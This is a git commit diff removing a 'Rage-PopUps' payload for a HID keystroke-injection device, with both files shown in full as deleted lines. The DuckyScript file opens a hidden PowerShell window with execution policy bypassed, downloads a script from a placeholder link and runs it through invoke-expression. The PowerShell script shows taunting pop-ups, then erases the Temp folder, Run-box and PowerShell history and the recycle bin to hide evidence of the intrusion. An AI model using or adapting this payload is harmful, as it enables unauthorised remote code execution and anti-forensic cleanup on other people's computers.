Delete Payloads/Flip-Rage-PopUps directory
This commit is contained in:
parent
51b2b62870
commit
0c67967cca
2 changed files with 0 additions and 90 deletions
|
@ -1,74 +0,0 @@
|
||||||
############################################################################################################################################################
|
|
||||||
# | ___ _ _ _ # ,d88b.d88b #
|
|
||||||
# Title : Rage-PopUps | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
|
|
||||||
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
|
|
||||||
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
|
|
||||||
# Category : Prank | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
|
|
||||||
# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ #
|
|
||||||
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
|
|
||||||
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
|
|
||||||
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
|
|
||||||
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
|
|
||||||
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
|
|
||||||
# tiktok.com/@i_am_jakoby # / \ / ~ \ #
|
|
||||||
# github.com/I-Am-Jakoby # \ / \~ ~/ #
|
|
||||||
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
|
|
||||||
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
|
|
||||||
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
|
|
||||||
############################################################################################################################################################
|
|
||||||
|
|
||||||
<#
|
|
||||||
.SYNOPSIS
|
|
||||||
This script will open a series of pop-ups in order to taunt your target. I wrote it initially to target call center scammers.
|
|
||||||
|
|
||||||
.DESCRIPTION
|
|
||||||
This program is meant to taunt your target. Below are a series insults you can modify as you like. The program will generate a Pop-up
|
|
||||||
for each one of them.
|
|
||||||
#>
|
|
||||||
|
|
||||||
#------------------------------------------------------------------------------------------------------------------------------------
|
|
||||||
|
|
||||||
Add-Type -AssemblyName System.Windows.Forms
|
|
||||||
|
|
||||||
# The number of times you want it to cycle through your list of questions
|
|
||||||
|
|
||||||
$cycles = 3
|
|
||||||
|
|
||||||
# List as many questions here as you like, it will cycle through all of them
|
|
||||||
|
|
||||||
$msgs = @(
|
|
||||||
"Are all scammers as dumb as you?"
|
|
||||||
"Is the pay worth being this big of a loser?"
|
|
||||||
"Do your parents know what you do for a living?"
|
|
||||||
"Does you boss know much much you suck at this job?"
|
|
||||||
)
|
|
||||||
|
|
||||||
for ($i=1; $i -le $cycles; $i++) {
|
|
||||||
|
|
||||||
Foreach ($msg in $msgs) {
|
|
||||||
[System.Windows.Forms.MessageBox]::Show($msg , "You're-a-Loser.exe" , 4 , 'Question')
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
#----------------------------------------------------------------------------------------------------
|
|
||||||
|
|
||||||
<#
|
|
||||||
|
|
||||||
.NOTES
|
|
||||||
This is to clean up behind you and remove any evidence to prove you were there
|
|
||||||
#>
|
|
||||||
# Delete contents of Temp folder
|
|
||||||
|
|
||||||
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
|
|
||||||
|
|
||||||
# Delete run box history
|
|
||||||
|
|
||||||
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
|
|
||||||
|
|
||||||
# Delete powershell history
|
|
||||||
|
|
||||||
Remove-Item (Get-PSreadlineOption).HistorySavePath
|
|
||||||
|
|
||||||
# Deletes contents of recycle bin
|
|
||||||
|
|
||||||
Clear-RecycleBin -Force -ErrorAction SilentlyContinue
|
|
|
@ -1,16 +0,0 @@
|
||||||
REM Title: Rage-PopUps
|
|
||||||
REM
|
|
||||||
REM Author: I am Jakoby
|
|
||||||
REM
|
|
||||||
REM Description: This payload is meant to make a never ending supply of taunting pop-ups. See Rage-PopUps.ps1 for more details
|
|
||||||
REM
|
|
||||||
REM Target: Windows 10, 11
|
|
||||||
REM
|
|
||||||
REM Remeber to replace the link with your link for the intended file to download
|
|
||||||
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
|
|
||||||
REM
|
|
||||||
GUI r
|
|
||||||
DELAY 500
|
|
||||||
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
|
|
||||||
DELAY 500
|
|
||||||
ENTER
|
|
Loading…
Reference in a new issue